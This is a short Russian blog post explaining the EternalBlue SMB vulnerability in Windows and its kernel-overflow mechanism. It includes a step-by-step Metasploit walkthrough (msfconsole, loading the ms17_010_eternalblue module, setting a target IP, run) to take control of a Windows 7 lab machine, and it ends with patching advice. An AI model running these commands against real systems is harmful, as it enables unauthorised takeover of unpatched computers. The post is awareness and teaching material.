Найти в Дзене
Александр Исаев

EternalBlue и как его используют против нас

Внимание! Информация в данной статье служит исключительно для ознакомления и осведомления. Данный материал не является призывом к действию

Многие из вас слышали об уязвимости EternalBlue (или CVE-2017-0144), затрагивающей ОС семейства Windows. Считается, что к разработке причастно АНБ (Агентство Национальной Безопасности США). Данный эксплойт затрагивает уязвимость в Windows-реализации протокола SMB.

Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete.

Так как же его используют? Всё очень просто

В качестве атакующего хоста используем Kali linux, а в качестве атакуемого объекта - Windows 7 SP1

Запускаем в терминале Kali linux Metasploit

> msfconsole

Загружаем нужный нам модуль

> use exploit/windows/smb/ms17_010_eternalblue

Указываем ip-адрес атакуемого нами компьютера с ОС Windows

> set rhost 192.168.1.176

и запускаем выбранный эксплойт

> run

Таким нехитрым образом, используя уязвимость, можно получить доступ к управлению операционной системой Windows.

Ну а чтобы защититься от EternalBlue - своевременно устанавливайте последние обновления для вашей операционной системы...или переходите на Linux :)